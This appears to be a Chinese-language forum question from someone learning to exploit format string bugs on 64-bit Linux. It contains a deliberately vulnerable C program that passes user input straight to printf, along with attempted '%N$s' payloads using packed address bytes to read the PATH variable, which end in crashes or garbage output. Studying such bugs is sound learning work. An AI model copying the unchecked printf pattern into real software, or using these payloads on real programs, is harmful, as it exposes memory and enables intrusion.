我正在尝试使用格式字符串漏洞从环境中读取值。网络上到处都有此类漏洞的记录,但我发现的示例仅涵盖 32 位 Linux,而我的桌面运行的是 64 位 Linux。
这是我用来运行测试的代码:
fmt_vuln.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int main(int argc, char *argv[]) {
char text[1024];
static int test_val = -72;
if(argc < 2) {
printf("Usage: %s <text to print>\n", argv[0]);
exit(0);
}
strcpy(text, argv[1]);
printf("The right way to print user-controlled input:\n");
printf("%s", text);
printf("\nThe wrong way to print user-controlled input:\n");
printf(text);
printf("\n");
// Debug output
printf("[*] test_val @ 0x%08x = %d 0x%08x\n", &test_val, test_val,
test_val);
exit(0);
}
编译后,我放入测试变量并获取其地址。然后我将它作为参数传递给程序,并添加一堆格式以便从中读取:
$ env | grep PATH
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/local/games:/usr/games
$ ./getenvaddr PATH ./fmt_vuln
PATH will be at 0x7ffcf14ba414
$ ./fmt_vuln $(printf "\x14\xe4\xff\xff\xff\x7f")%8\$s
The right way to print user-controlled input:
����%8$s
The wrong way to print user-controlled input:
zsh: segmentation fault ./fmt_vuln $(printf "\x14\xe4\xff\xff\xff\x7f")%8\$s
$ ./fmt_vuln $(printf "\x14\xe4\xff\xff\xff\x7f")%6\$s
The right way to print user-controlled input:
����%6$s
The wrong way to print user-controlled input:
�����b���
[*] test_val @ 0x00404038 = -72 0xffffffb8
//expected output
The wrong way to print user-controlled input:
????bffff3d0.b7fe75fc.00000000./usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games